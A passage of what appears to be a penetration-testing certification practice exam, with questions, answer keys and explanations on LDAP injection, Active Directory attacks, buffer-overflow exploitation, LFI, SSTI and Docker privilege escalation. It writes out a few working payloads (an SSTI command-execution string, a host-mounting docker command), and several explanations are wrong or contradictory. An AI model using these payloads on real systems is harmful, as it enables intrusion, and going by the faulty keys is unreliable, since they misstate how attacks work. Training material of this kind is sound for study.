The correct interpretation: by closing the original filter with ')' and injecting '(&)', the tester creates a condition that is always true, causing the query to return all directory objects.

Why this answer

Option D is correct because the payload 'admin)(&)' closes the original LDAP filter after 'admin' and appends '(&)' which is a tautology (always true). This causes the LDAP query to match all directory objects, returning the full user list instead of a single user. The attack exploits the way LDAP filters are parsed: injecting a closing parenthesis and a new filter that evaluates to true for every entry.

Exam trap

The trap here is that candidates confuse the LDAP injection payload with SQL injection patterns, mistakenly thinking the '&' operator creates an OR condition, when in LDAP prefix notation '&' is an AND operator and the tautology works by appending an always-true filter, not by negating the original condition.

How to eliminate wrong answers

Option A is wrong because the payload does not cause an LDAP error; it successfully modifies the filter syntax to return all users, not a fallback behavior. Option B is wrong because the payload does not alter the base DN (distinguished name) of the search; it only manipulates the filter component of the query. Option C is wrong because the payload introduces a logical AND (the '&' operator) which is a conjunction, not a logical OR; the tautology makes the entire filter true, not by negating the original condition but by appending an always-true clause.

51
MCQmedium

A penetration tester has compromised a Windows workstation and obtained a low-privileged domain user account. The tester discovers that this user belongs to a group that has the 'GenericWrite' privilege over a computer object in Active Directory. Which attack is most directly enabled by this misconfiguration?

A.Kerberoasting
B.Shadow Credentials
C.AS-REP Roasting
D.DCSync Attack
AnswerB

With GenericWrite over a computer object, the tester can write to the msDS-KeyCredentialLink attribute to add a rogue key credential, enabling a Shadow Credentials attack to request a TGT for the computer account.

Why this answer

The 'GenericWrite' privilege over a computer object allows the attacker to write to the msDS-KeyCredentialLink attribute of that object. By adding a rogue key credential, the attacker can trigger the Key Distribution Center (KDC) to accept a certificate-based authentication, enabling the Shadow Credentials attack to obtain a TGT for the computer account and escalate privileges.

Exam trap

The trap here is that candidates confuse the GenericWrite privilege with the ability to perform Kerberoasting or AS-REP Roasting, but those attacks require different preconditions (SPN or no pre-authentication) and do not directly exploit write access to computer object attributes.

How to eliminate wrong answers

Option A is wrong because Kerberoasting requires the attacker to have a valid TGT for a domain user and targets service accounts with SPNs, not computer objects with GenericWrite. Option C is wrong because AS-REP Roasting targets user accounts that do not require Kerberos pre-authentication, not computer objects, and does not leverage GenericWrite over an object.

52
MCQeasy

During a penetration test, a tester needs to perform a man-in-the-middle attack on a network that uses WPA2-Enterprise with PEAP. Which tool is most appropriate for capturing the authentication handshake to attempt offline cracking?

A.Wireshark
B.aircrack-ng
C.Ettercap
D.hostapd-wpe
AnswerD

hostapd-wpe sets up a rogue access point that captures EAP credentials for offline cracking.

Why this answer

hostapd-wpe (Wireless Pwnage Edition) is specifically designed to set up a rogue access point that impersonates a legitimate WPA2-Enterprise network. It captures the MSCHAPv2 challenge-response from the PEAP authentication handshake, which can then be used for offline dictionary or brute-force attacks against the user's credentials. Unlike other tools, hostapd-wpe handles the full EAP/PEAP exchange required for this attack.

Exam trap

The trap here is that candidates often confuse aircrack-ng's ability to capture WPA2-PSK handshakes with the different requirements of WPA2-Enterprise, where the attack targets the MSCHAPv2 credentials rather than the 4-way handshake.

How to eliminate wrong answers

Option A is wrong because Wireshark is a packet analyzer that can capture traffic but cannot perform a man-in-the-middle attack or initiate an authentication handshake; it lacks the ability to set up a rogue AP. Option B is wrong because aircrack-ng is used for cracking WPA/WPA2-PSK (pre-shared key) handshakes, not WPA2-Enterprise with PEAP, which uses EAP-MSCHAPv2 and requires a different attack vector. Option C is wrong because Ettercap is a network sniffing and MITM tool for LAN-based attacks (e.g., ARP spoofing), but it does not support 802.11 wireless rogue AP setup or EAP/PEAP handshake capture.

53
MCQhard

A penetration tester is exploiting a Linux system that has ASLR enabled but no stack canaries. The vulnerability is a classic stack-based buffer overflow. Which of the following is the most effective method to achieve code execution?

A.Prepend a NOP sled and inject shellcode into the buffer
B.Return-to-libc (ret2libc)
C.Return to the PLT entry for system()
D.Use a ROP chain to bypass ASLR and execute shellcode
AnswerC

The PLT (Procedure Linkage Table) address is not randomized by ASLR, allowing reliable calls to library functions.

Why this answer

Option C is correct because with ASLR enabled, direct shellcode injection fails due to randomized stack addresses, but the PLT entry for system() has a fixed, known address in the binary. Since there are no stack canaries, a simple buffer overflow can overwrite the return address to jump directly to system() in the PLT, passing a pointer to a command string (e.g., "/bin/sh") already in memory, achieving code execution without needing to know runtime addresses.

Exam trap

The trap here is that candidates assume ASLR always prevents code execution, but they overlook that PLT entries have fixed addresses in the binary, making ret2plt a viable bypass when no stack canaries are present.

How to eliminate wrong answers

Option A is wrong because ASLR randomizes the stack base address, making it impossible to reliably predict where the NOP sled and shellcode reside, so the overwritten return address will likely point to an invalid location. Option B is wrong because return-to-libc typically requires knowing the runtime address of libc functions, which is randomized by ASLR; the PLT entry is a better target as it is resolved at load time and has a fixed address in the binary. Option D is wrong because a ROP chain can bypass ASLR only if you can leak a runtime address first (e.g., via an info leak), which is not provided in this scenario; without a leak, ROP cannot reliably locate gadgets in randomized memory regions.

54
MCQhard

A penetration tester has gained a low-privileged shell on a Linux server and discovers a binary with the SUID bit set owned by root. The binary executes a system command using a relative path without sanitizing user input. Which of the following techniques would the tester MOST likely use to escalate privileges?

A.Exploit a kernel vulnerability to gain root
B.Modify the PATH environment variable to point to a malicious script with the same name as the command called by the binary
C.Impersonate the root user using sudo
D.Preload a shared library using LD_PRELOAD
AnswerB

PATH hijacking leverages the SUID binary's use of a relative path; by placing a malicious executable earlier in PATH, the binary executes it with root privileges.

Why this answer

Option B is correct because the SUID binary executes a system command using a relative path without sanitizing user input. By modifying the PATH environment variable to include a directory containing a malicious script with the same name as the command, the tester can cause the binary to execute the attacker-controlled script instead of the intended system command, thereby escalating privileges to root when the SUID binary runs.

Exam trap

The trap here is that candidates may think kernel exploitation (Option A) is always the go-to for privilege escalation, but the question specifically describes a misconfigured SUID binary with a relative path and unsanitized input, making PATH hijacking the most direct and likely technique.

How to eliminate wrong answers

Option A is wrong because exploiting a kernel vulnerability is a different technique that does not leverage the specific misconfiguration of the SUID binary with a relative path and unsanitized input; it would be used if no such binary existed or if kernel exploits were available, but the question explicitly describes a binary that can be exploited via PATH hijacking. Option C is wrong because impersonating the root user using sudo requires the tester to already have sudo privileges or know the root password, which is not the case here; the tester has a low-privileged shell and cannot simply use sudo without proper authorization.

55
MCQmedium

A penetration tester is performing a social engineering campaign against a client. The tester wants to send a phishing email that bypasses the email security gateway and appears to come from an internal source. Which technique is most effective?

A.Set the Reply-To address to an attacker-controlled email
B.Insert a custom email header that mimics internal mail
C.Use a URL shortener to hide the malicious link
D.Register a similar domain and spoof the display name
AnswerA

This bypasses gateways because the sender appears legitimate, but replies go to the attacker.

Why this answer

Setting the Reply-To address to an attacker-controlled email is the most effective technique because many email security gateways (ESGs) perform SPF, DKIM, and DMARC validation on the SMTP envelope sender (Return-Path) but do not validate the Reply-To header. By spoofing the From address to an internal user and setting Reply-To to an attacker-controlled address, replies bypass the ESG's authentication checks while the email appears to come from an internal source, increasing the likelihood of user interaction.

Exam trap

The trap here is that candidates often confuse the Reply-To header with the From header, assuming that setting the Reply-To address is equivalent to spoofing the sender, when in fact the ESG's authentication checks focus on the From and envelope sender, not the Reply-To, making this a subtle but effective bypass.

How to eliminate wrong answers

Option B is wrong because inserting a custom email header that mimics internal mail does not bypass SPF/DKIM/DMARC validation; the ESG still checks the SMTP envelope sender and the From header against DNS records, so the email will likely be rejected or flagged. Option C is wrong because using a URL shortener hides the malicious link but does not address the ESG's authentication checks on the sender domain; the email still fails SPF/DKIM/DMARC if the From domain is spoofed, and many ESGs now block or sandbox shortened URLs. Option D is wrong because registering a similar domain and spoofing the display name only bypasses human inspection, not the ESG's automated checks; the ESG will still validate the actual domain in the From header against SPF/DKIM/DMARC records, and the similar domain will fail unless it is also configured with proper authentication records.

56
MCQhard

A penetration tester has discovered a local file inclusion (LFI) vulnerability in a PHP web application. The vulnerable code uses the following pattern: include($_GET['page']);. The application runs on a Linux server with Apache and PHP. The tester wants to achieve remote code execution (RCE). Which technique is most likely to succeed given this LFI?

A.Use the php://input wrapper and send PHP code in the POST body.
B.Use the file:// wrapper to read sensitive files like /etc/passwd.
C.Use the data:// wrapper with a base64-encoded PHP payload.
D.Set allow_url_include to On in php.ini via the LFI.
AnswerA

php://input reads the raw POST data. When included, the PHP interpreter will execute any code contained in the POST body. This is a common technique to turn LFI into RCE, and it does not require allow_url_include to be enabled.

Why this answer

The correct technique is to use the php://input wrapper because it allows the attacker to pass arbitrary PHP code in the HTTP POST body, which the include() function will execute as PHP. Since the vulnerable code directly includes user input without sanitization, the php://input stream reads the raw POST data and processes it as a PHP script, achieving remote code execution.

Exam trap

The trap here is that candidates often assume data:// is the most direct way to inject code, but they overlook that php://input is more reliable because it does not require allow_url_include to be enabled, which is a common security hardening measure.

How to eliminate wrong answers

Option B is wrong because the file:// wrapper only reads local files and does not allow code execution; it would only read sensitive files like /etc/passwd, not achieve RCE. Option C is wrong because while the data:// wrapper can execute PHP code if the allow_url_include directive is enabled, it is often disabled by default in modern PHP configurations, making it less reliable than php://input, which is more commonly available and does not require allow_url_include to be enabled for this purpose.

57
MCQmedium

A penetration tester is testing a web application that has input validation blocking single quotes. The tester wants to perform a SQL injection attack. Which of the following techniques would be MOST effective to bypass the filter?

A.Using URL encoding for the single quote (%27)
B.Using double quotes instead of single quotes
C.Using a second-order SQL injection
D.Using a payload without quotes, such as numeric injection
AnswerD

If the input is used in a numeric context (e.g., WHERE id=5), quoting is not needed, allowing injection without single quotes.

Why this answer

Option D is correct because numeric injection does not require quotes at all, directly bypassing the single-quote filter. When the vulnerable parameter expects a numeric value (e.g., an ID), the tester can inject SQL logic like `OR 1=1` without any quotes, making it the most effective technique against input validation that blocks single quotes.

Exam trap

The trap here is that candidates often assume URL encoding or alternative quote characters will bypass the filter, but they overlook that the filter operates on the decoded input or that SQL syntax strictly requires single quotes for string delimiters.

How to eliminate wrong answers

Option A is wrong because URL encoding (%27) is typically decoded by the web server before the input reaches the application, so the filter still sees the single quote and blocks it. Option B is wrong because double quotes are not interchangeable with single quotes in SQL; string literals in SQL (e.g., MySQL, PostgreSQL) require single quotes, so double quotes would not close the string and would likely cause a syntax error or be treated as identifiers. Option C is wrong because second-order SQL injection relies on storing malicious input (often containing quotes) in the database and later executing it; the initial injection still needs to bypass the filter to store the payload, so it does not solve the immediate problem of the single-quote filter.

58
MCQeasy

A penetration tester is using a vulnerability scanner that reports a 'Critical' severity for an 'SMBv1 vulnerability' on a Windows server. Which of the following is the correct remediation recommendation?

A.Apply the latest Windows security patches
B.Disable SMBv1 on the server
C.Enable SMB signing
D.Enable SMB encryption
AnswerB

Disabling the insecure protocol is the most effective remediation.

Why this answer

The correct remediation for an SMBv1 vulnerability is to disable SMBv1 on the server. SMBv1 is a legacy protocol that lacks modern security features and is known to be exploited by malware like EternalBlue (used in WannaCry). Disabling SMBv1 eliminates the attack surface without affecting SMBv2 or SMBv3, which are secure and still functional.

Exam trap

The trap here is that candidates assume patching (Option A) is sufficient for all vulnerabilities, but for SMBv1, the protocol itself is deprecated and must be disabled rather than just patched.

How to eliminate wrong answers

Option A is wrong because applying the latest Windows security patches only addresses specific CVEs but does not remove the inherently insecure SMBv1 protocol; patches can be bypassed or incomplete, whereas disabling SMBv1 is the definitive fix. Option C is wrong because enabling SMB signing provides integrity and authentication for SMB traffic but does not mitigate the SMBv1 protocol's fundamental vulnerabilities, such as buffer overflow exploits. Option D is wrong because enabling SMB encryption protects data in transit but does not disable or patch the SMBv1 protocol itself, leaving the server still vulnerable to SMBv1-specific attacks.

59
MCQhard

During an internal test, a penetration tester discovers a web application that is vulnerable to Server-Side Template Injection (SSTI). The application uses a template engine that does not sandbox user input. Which of the following payloads would be MOST effective to achieve remote code execution on the server?

A.{{7*7}}
B.<script>alert('xss')</script>
C.${7*7}
D.{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
AnswerD

Correct. This payload exploits Python object chaining to execute system commands, achieving remote code execution.

Why this answer

Option D is correct because it exploits Python's object model to access the `os` module via `__class__.__init__.__globals__`, bypassing the template engine's lack of sandboxing. This allows the attacker to execute arbitrary system commands like `id` on the server, achieving remote code execution (RCE). The payload is specific to Jinja2 or similar Python-based template engines that expose built-in objects.

Exam trap

The trap here is that candidates confuse SSTI with simple template injection tests (like `{{7*7}}`) or XSS, failing to recognize that the correct payload must chain object introspection to access system commands for RCE.

How to eliminate wrong answers

Option A is wrong because `{{7*7}}` is a simple math expression that only tests for SSTI vulnerability (returning 49) but does not achieve RCE. Option B is wrong because `<script>alert('xss')</script>` is a Cross-Site Scripting (XSS) payload, not an SSTI payload, and it targets client-side execution, not server-side RCE. Option C is wrong because `${7*7}` is a Java Expression Language (EL) injection syntax, not applicable to Python-based template engines; it would not execute in a Jinja2 context and does not lead to RCE.

60
Drag & Dropmedium

Drag and drop the steps to perform a password cracking attack using John the Ripper into the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order

Why this order

Password cracking requires hash acquisition, type identification, running the tool, and using results for further attacks.

61
MCQmedium

A penetration tester is performing a man-in-the-middle attack on a network using ARP spoofing. What is the primary purpose of ARP spoofing?

A.To assign a fake IP address to the attacker's device
B.To associate the attacker's MAC address with the IP address of a legitimate host
C.To modify the routing table of the target
D.To poison the DNS cache of the target
AnswerB

This redirects traffic destined for that IP to the attacker.

Why this answer

ARP spoofing works by sending forged ARP replies to associate the attacker's MAC address with the IP address of a legitimate host (e.g., the default gateway). This causes traffic destined for that IP to be sent to the attacker instead, enabling interception and manipulation of network communications.

Exam trap

The trap here is that candidates confuse ARP spoofing with IP address spoofing or DNS poisoning, but the exam specifically tests that ARP spoofing manipulates MAC-to-IP mappings at Layer 2, not IP addresses or higher-layer caches.

How to eliminate wrong answers

Option A is wrong because ARP spoofing does not assign a fake IP to the attacker; the attacker retains their own IP and instead manipulates the IP-to-MAC mapping on other hosts. Option C is wrong because ARP spoofing operates at Layer 2 (Data Link) and does not modify routing tables, which are Layer 3 constructs managed by protocols like RIP or OSPF. Option D is wrong because DNS cache poisoning targets the DNS resolver's cache (Layer 7), whereas ARP spoofing targets the ARP cache (Layer 2) to redirect traffic at the network access layer.

62
MCQhard

A penetration tester discovers that a web application uses a vulnerable Java deserialization endpoint. The classpath includes the Apache Commons Collections library. Which attack technique is most likely to achieve remote code execution?

A.Java deserialization of untrusted data (RCE via Commons Collections).
B.SQL injection.
C.Cross-site scripting.
D.Command injection.
AnswerA

The presence of Commons Collections provides known gadget chains (e.g., ysoserial) that can achieve code execution during deserialization, making this the direct attack vector.

Why this answer

The correct answer is A because the presence of the Apache Commons Collections library in the classpath, combined with a vulnerable Java deserialization endpoint, enables the classic 'gadget chain' attack. Attackers craft a malicious serialized object that, when deserialized, invokes methods in Commons Collections (e.g., InvokerTransformer) to execute arbitrary system commands, achieving remote code execution (RCE). This is a well-documented exploit chain (e.g., CVE-2015-7501) that directly leverages the library's reflection-based classes.

Exam trap

The trap here is that candidates may confuse deserialization attacks with other input-based attacks like SQLi or XSS, failing to recognize that the specific vulnerability is the unsafe deserialization of Java objects using a known gadget library (Commons Collections) to achieve server-side RCE.

How to eliminate wrong answers

Option B is wrong because SQL injection targets database queries via input manipulation, not Java deserialization of objects; it does not exploit the deserialization endpoint or the Commons Collections library. Option C is wrong because cross-site scripting (XSS) injects client-side scripts into web pages, not server-side code execution via deserialization; it cannot achieve RCE through Java object deserialization.

63
MCQmedium

A penetration tester is attempting a pass-the-hash (PtH) attack against a Windows domain-joined machine. The tester has obtained the NTLM hash of a local administrator account. Which tool can be used directly to authenticate using the hash to gain remote command execution?

A.John the Ripper
B.Metasploit's psexec module
C.Mimikatz
D.Nmap
AnswerB

The psexec module in Metasploit allows authentication with a plaintext password or NTLM hash to execute commands on a remote Windows system via SMB.

Why this answer

Metasploit's psexec module (exploit/windows/smb/psexec) directly accepts an NTLM hash via the 'SMBPass' option and uses it to authenticate over SMB, then creates a service on the target to execute commands. This is a classic pass-the-hash technique against Windows systems, as the module leverages the SMB protocol and Windows service control manager without needing the plaintext password.

Exam trap

The trap here is that candidates confuse Mimikatz's ability to perform pass-the-hash locally (spawning a cmd.exe with the hash) with the ability to directly execute commands remotely, but Mimikatz requires additional tools like PsExec or WinRM to achieve remote execution, whereas Metasploit's psexec module is a single-step solution.

How to eliminate wrong answers

Option A is wrong because John the Ripper is a password cracking tool that attempts to recover plaintext passwords from hashes, not a tool that can directly authenticate using a hash for remote command execution. Option C is wrong because Mimikatz is primarily a credential extraction and manipulation tool that can perform pass-the-hash locally (e.g., via sekurlsa::pth) to spawn a process with the hash, but it does not directly provide remote command execution against a domain-joined machine without additional steps like scheduling a remote task or using PsExec.

64
MCQmedium

A penetration tester discovers a web application that deserializes user-controlled data without validation. The application uses Java serialization. The tester creates a malicious serialized object that executes a system command. Which of the following conditions is required for this exploit to succeed?

A.The application must be running with root privileges
B.The application must use a custom ClassLoader
C.The Java runtime must have a gadget chain available in its classpath
D.The application must be running on a Windows operating system
AnswerC

Gadget chains like those in Apache Commons Collections are necessary to transform deserialization into code execution.

Why this answer

Java deserialization exploits rely on the presence of specific classes (gadget chains) in the application's classpath that can be chained together to achieve arbitrary code execution. The attacker crafts a serialized object that, when deserialized, triggers a sequence of method calls (gadget chain) that ultimately executes a system command. Without a suitable gadget chain available in the classpath, the deserialization of a malicious object will not lead to code execution.

Exam trap

CompTIA often tests the misconception that privilege escalation (root) or custom class loading is required, when in fact the core requirement is the availability of gadget chains in the classpath.

How to eliminate wrong answers

Option A is wrong because the exploit does not require root privileges; it relies on the application's own permissions and the presence of gadget chains, not on the operating system user. Option B is wrong because a custom ClassLoader is not a prerequisite for Java deserialization attacks; the exploit works with the default class loading mechanism as long as the necessary gadget classes are in the classpath.

65
MCQmedium

During a penetration test, a tester gains shell access on a Linux server as a low-privileged user. The user is identified to be a member of the 'docker' group. Which technique is most effective for escalating privileges to root?

A.Use docker to mount the entire host filesystem and modify the root password.
B.Use docker to run a container with network host mode to access internal services.
C.Use docker to pull a malicious image from the internet to compromise other containers.
D.Use docker to create a new user with root privileges inside a container.
AnswerA

Running 'docker run -v /:/mnt -it ubuntu bash' mounts the host root filesystem. From inside the container, the attacker can chroot to /mnt and modify /etc/shadow or add an SSH authorized key, gaining full root access.

Why this answer

Membership in the 'docker' group grants the user effective root-equivalent access because the Docker daemon runs as root and allows any member of the 'docker' group to issue commands that can mount arbitrary host paths. By running a container with the host filesystem mounted (e.g., `docker run -v /:/mnt --privileged -it alpine chroot /mnt`), the tester can directly modify the `/etc/shadow` file or the root password, thereby escalating privileges to root without needing any additional exploit.

Exam trap

The trap here is that candidates may think Docker group membership only allows container management or network manipulation, overlooking the fact that the Docker socket grants full root-equivalent file system access via volume mounts.

How to eliminate wrong answers

Option B is wrong because using network host mode (`--network host`) only gives the container access to the host's network stack, which might help with lateral movement or service discovery but does not provide a mechanism to escalate privileges to root on the host itself. Option C is wrong because pulling a malicious image from the internet could compromise other containers or the host if the image exploits a vulnerability, but it is not a reliable or direct method for privilege escalation; the most effective and immediate technique is to mount the host filesystem and modify authentication files.

66
MCQmedium

A penetration tester has gained a foothold on a Windows server running IIS. The tester wants to perform an SMB relay attack to move laterally within the domain. Which of the following conditions must be met for this attack to succeed?

A.The target server must have SMB signing disabled or not enforced
B.The tester must have local administrator privileges on the IIS server
C.The target server must be running SMBv1
D.The tester must have a valid domain user account to trigger the relay
AnswerA

SMB signing prevents relay attacks because the relayed authentication would lack the required signature, causing the target to reject the connection. Without signing enforced, the relay is possible.

Why this answer

SMB relay attacks work by intercepting an SMB authentication attempt and forwarding it to a target server. For the relay to succeed, the target server must not require SMB signing, or signing must be disabled, because signing cryptographically binds the authentication to the original session, preventing the relayed credentials from being reused. If SMB signing is enforced, the target server will reject the relayed authentication, as the signature will not match the new session.

Exam trap

The trap here is that candidates often assume SMB relay requires SMBv1 or local admin privileges, but the critical condition is the absence of SMB signing enforcement, which is a common misconfiguration in enterprise environments.

How to eliminate wrong answers

Option B is wrong because local administrator privileges on the IIS server are not required for an SMB relay attack; the attacker only needs to be able to capture or trigger an SMB authentication attempt (e.g., via a rogue SMB server or by tricking a user) and relay it to the target. Option C is wrong because SMB relay attacks do not require SMBv1; they can work over SMBv2 or SMBv3 if signing is not enforced, though SMBv1 is often targeted due to its weaker security defaults.

67
MCQhard

A penetration tester gains a foothold on a Linux system with ASLR and NX enabled. The tester identifies a stack buffer overflow in a SUID binary. The binary has no PIE (Position Independent Executable) and is compiled without stack canaries. The tester wants to execute a shell. Which technique should be used?

A.Return-to-libc attack
B.Heap spraying
C.ROP chain
D.Buffer overflow with NOP sled
AnswerC

ROP chains use gadgets from the non-randomized binary (since it lacks PIE) to execute arbitrary code, bypassing both ASLR and NX.

Why this answer

Since the binary has no PIE and lacks stack canaries, the attacker can predict the address of the return address on the stack. However, with ASLR and NX enabled, the stack is non-executable and system library addresses are randomized. A ROP chain allows the tester to bypass both protections by chaining small instruction sequences (gadgets) already present in the binary or loaded libraries to achieve arbitrary code execution, such as calling execve to spawn a shell.

Exam trap

CompTIA often tests the misconception that return-to-libc alone bypasses ASLR, but without a leak, the randomized libc base makes the attack fail; the trap here is that candidates may overlook the need for an information leak or assume that a non-PIE binary eliminates ASLR entirely.

How to eliminate wrong answers

Option A is wrong because a return-to-libc attack relies on knowing the address of a libc function like system(), but ASLR randomizes the base address of libc, making the address unpredictable without an information leak. Option B is wrong because heap spraying is used to exploit heap-based vulnerabilities or to bypass ASLR by filling the heap with shellcode, but here the vulnerability is a stack buffer overflow and NX prevents execution of shellcode placed on the stack or heap.

68
Multi-Selectmedium

Which TWO of the following are effective methods for bypassing AppLocker during a penetration test? (Choose two.)

Select 2 answers
A.Execute code via WMIC
B.Use InstallUtil.exe to run a malicious .exe
C.Run regsvr32.exe to execute a .dll
D.Use PowerShell with Bypass execution policy
E.Launch a script with cscript.exe
AnswersB, C

InstallUtil is a trusted binary that can be used to execute code.

Why this answer

Option A is correct because regsvr32 can be used to execute code via DLL registration. Option D is correct because InstallUtil is a trusted Microsoft executable that can run arbitrary code. Option B is wrong because PowerShell execution policy is separate from AppLocker.

Option C is wrong because WMIC is not typically allowed by AppLocker. Option E is wrong because Cscript is often blocked, but using trusted binaries is the key.

69
MCQhard

A penetration tester is targeting a web application that uses parameterized queries for all database interactions. Which attack vector is most likely to succeed?

A.Cross-site request forgery
B.SQL injection
C.Cross-site scripting
D.Business logic flaws
AnswerD

Parameterized queries do not protect against logic flaws such as manipulating pricing or access controls.

Why this answer

Parameterized queries prevent SQL injection by separating SQL code from user input, making option B ineffective. Business logic flaws (D) are vulnerabilities in the application's design or workflow that are not mitigated by secure coding practices like parameterized queries, so they remain exploitable. This attack vector targets the intended functionality of the application, such as manipulating pricing or bypassing authentication steps, which parameterized queries do not protect against.

Exam trap

The trap here is that candidates assume parameterized queries eliminate all database-related attacks, overlooking that business logic flaws are independent of query construction and remain a viable attack vector.

How to eliminate wrong answers

Option A is wrong because cross-site request forgery exploits the trust a site has in a user's browser, not database query construction, and parameterized queries have no impact on CSRF defenses. Option B is wrong because parameterized queries are specifically designed to prevent SQL injection by ensuring user input is treated as data, not executable code, so this attack vector will fail. Option C is wrong because cross-site scripting exploits client-side script injection in web pages, not database interactions, and parameterized queries do not affect XSS vulnerabilities.

70
MCQhard

During a penetration test, a tester finds a custom binary that is vulnerable to a stack-based buffer overflow. The binary has DEP enabled but no ASLR. Which of the following exploitation techniques would be MOST effective to achieve code execution?

A.Return-oriented programming (ROP) to bypass DEP
B.Heap spraying to inject shellcode
C.ret2libc to call system() with a controlled argument
D.Stack pivoting to redirect execution to a known location
AnswerC

ret2libc leverages existing libc functions (like system) at fixed addresses (since no ASLR) to execute commands, bypassing DEP.

Why this answer

Option C is correct because ret2libc allows the tester to call the system() function from libc with a controlled argument (e.g., "/bin/sh") to spawn a shell, bypassing DEP (which prevents code execution on the stack) without needing to execute shellcode. Since ASLR is disabled, the address of system() and the string "/bin/sh" in libc are predictable, making this technique reliable and effective.

Exam trap

The trap here is that candidates may choose ROP (Option A) thinking it is always required to bypass DEP, but ret2libc is a simpler and more effective technique when ASLR is disabled, as it directly calls a libc function without needing to chain gadgets.

How to eliminate wrong answers

Option A is wrong because Return-oriented programming (ROP) is also a valid technique to bypass DEP, but it is more complex and unnecessary when ASLR is disabled; ret2libc is simpler and more direct for achieving code execution. Option B is wrong because heap spraying is used to bypass ASLR by filling the heap with NOP sleds and shellcode, but ASLR is already disabled, and DEP prevents execution of shellcode on the heap, making this ineffective. Option D is wrong because stack pivoting is a technique to redirect execution to a controlled memory region (e.g., the heap) when the stack is not directly controllable, but here the vulnerability is a stack-based buffer overflow where the stack is directly controllable, and DEP is bypassed via ret2libc, not by pivoting.

71
MCQhard

During a red team engagement, a penetration tester needs to pivot from a compromised internal web server to a database server that is not directly accessible. The web server has two network interfaces: 10.0.1.5 and 192.168.1.5. The database server is at 192.168.1.10. Which technique should the tester use to reach the database?

A.ARP spoofing
B.DNS tunneling
C.Port knocking
D.Pivoting through the web server
AnswerD

The web server can route traffic to the database subnet, allowing the tester to attack the database.

Why this answer

D is correct because the web server has two network interfaces (10.0.1.5 and 192.168.1.5), making it a dual-homed host that can act as a pivot point. The tester can use the compromised web server as a proxy or relay to route traffic from the attacker's machine (reachable via 10.0.1.5) to the database server at 192.168.1.10, which is on a separate subnet not directly accessible. This technique, known as pivoting, typically involves tools like SSH port forwarding, Metasploit's route add, or a SOCKS proxy to forward traffic through the compromised host.

Exam trap

The trap here is that candidates confuse pivoting with other network manipulation techniques like ARP spoofing or port knocking, failing to recognize that the dual-homed web server provides a routing path between subnets, which is the core requirement for pivoting.

How to eliminate wrong answers

Option A is wrong because ARP spoofing operates at Layer 2 within the same broadcast domain to intercept traffic between hosts, but it cannot bridge traffic across different subnets (10.0.1.0/24 and 192.168.1.0/24) or provide access to a host that is not directly reachable from the attacker. Option B is wrong because DNS tunneling encapsulates non-DNS traffic within DNS queries and responses, which is used for exfiltration or command-and-control, not for routing traffic through a dual-homed host to reach an internal database server. Option C is wrong because port knocking is an authentication method that opens a firewall port after a sequence of connection attempts, but it does not enable routing or forwarding of traffic from one subnet to another through a compromised host.

72
MCQhard

A penetration tester has gained low-privilege shell access on a Linux server. The tester runs `sudo -l` and sees the following entry: `(root) NOPASSWD: /usr/bin/python3 /opt/scripts/*.py` The `/opt/scripts/` directory is owned by the tester's current user. Which technique is most effective for escalating privileges to root?

A.Create a symbolic link from a Python script to a system file like /etc/shadow
B.Write a malicious Python script to /opt/scripts/ that spawns a root shell
C.Exploit a kernel vulnerability to overwrite the sudo binary
D.Overwrite an existing Python script in /usr/bin/ with a malicious payload
AnswerB

Since the user owns the directory, they can write a Python script that executes `/bin/bash` or similar, then run it via sudo to gain a root shell.

Why this answer

Option B is correct because the tester's user owns `/opt/scripts/` and can write arbitrary files there. The sudo rule allows executing any `.py` file in that directory as root without a password. By writing a Python script that calls `os.setuid(0); os.system('/bin/bash')` or similar, the tester can spawn a root shell, directly leveraging the misconfigured sudoers entry.

Exam trap

The trap here is that candidates may think symbolic links or overwriting system files are viable, but the key is that the sudo rule specifically executes Python scripts from a writable directory, making a crafted script the simplest and most direct escalation path.

How to eliminate wrong answers

Option A is wrong because creating a symbolic link from a Python script to `/etc/shadow` would not execute as root; `sudo` runs the Python interpreter on the linked file, but `/etc/shadow` is not a valid Python script and would cause an error, not privilege escalation. Option C is wrong because exploiting a kernel vulnerability is unnecessary and less reliable; the sudo misconfiguration provides a direct, low-risk path to root without kernel exploits. Option D is wrong because the sudo rule only applies to `/opt/scripts/*.py`, not to `/usr/bin/`; overwriting a script there would not be executed with root privileges via this sudo entry.

73
MCQmedium

Refer to the exhibit. After running a port scan in Metasploit, what is the next best step to identify vulnerabilities on the open ports?

A.Perform a brute-force attack against SSH and HTTP
B.Immediately exploit the open HTTP service
C.Run a Nessus scan on the host
D.Use the scanner to run service version detection on those ports
AnswerD

Knowing the exact version of services allows matching against known vulnerabilities.

Why this answer

After a port scan in Metasploit, the next best step is to run service version detection (e.g., using the `scanner/portscan/tcp` auxiliary module's `VERSION` option or the `db_nmap -sV` command) to identify the exact software and version running on each open port. This version information is critical for matching against known vulnerabilities in databases like CVE or Exploit-DB, enabling targeted exploitation. Option D is correct because it follows the systematic penetration testing methodology of enumeration before exploitation.

Exam trap

The trap here is that candidates often jump to exploitation (Option B) or brute-forcing (Option A) without performing version detection, missing the critical enumeration step that identifies the exact service version needed to select the correct exploit.

How to eliminate wrong answers

Option A is wrong because performing a brute-force attack against SSH and HTTP without first identifying service versions is premature and inefficient; it wastes time on guessing credentials when the services might have known unpatched vulnerabilities that are easier to exploit. Option B is wrong because immediately exploiting the open HTTP service without version detection risks using an incorrect or incompatible exploit, which could crash the service or alert defenders, and violates the principle of thorough enumeration. Option C is wrong because running a Nessus scan on the host is a valid next step, but the question specifically asks for the next best step after a Metasploit port scan, and Metasploit's built-in service version detection (e.g., `db_nmap -sV` or auxiliary scanner modules) is more direct and integrated into the Metasploit workflow, whereas Nessus is an external tool that requires separate setup and may not be available in all exam scenarios.

74
MCQhard

A penetration tester is targeting a Windows domain controller. After compromising a standard user account, the tester wants to escalate to domain admin. Which attack is most effective if the tester can capture plaintext passwords from memory?

A.Create a golden ticket
B.Create a silver ticket
C.Pass-the-hash attack
D.DCSync attack
AnswerC

With a captured NTLM hash, the tester can authenticate to other services as that user, potentially gaining domain admin if the user has privileges.

Why this answer

Option C is correct because capturing plaintext passwords from memory (e.g., via Mimikatz sekurlsa::logonpasswords) allows the tester to directly use the domain admin's plaintext credentials in a pass-the-hash attack. This attack reuses the NTLM hash (or plaintext) to authenticate to other systems without needing to crack or forge tickets, making it the most direct escalation path from a standard user to domain admin when plaintext passwords are available.

Exam trap

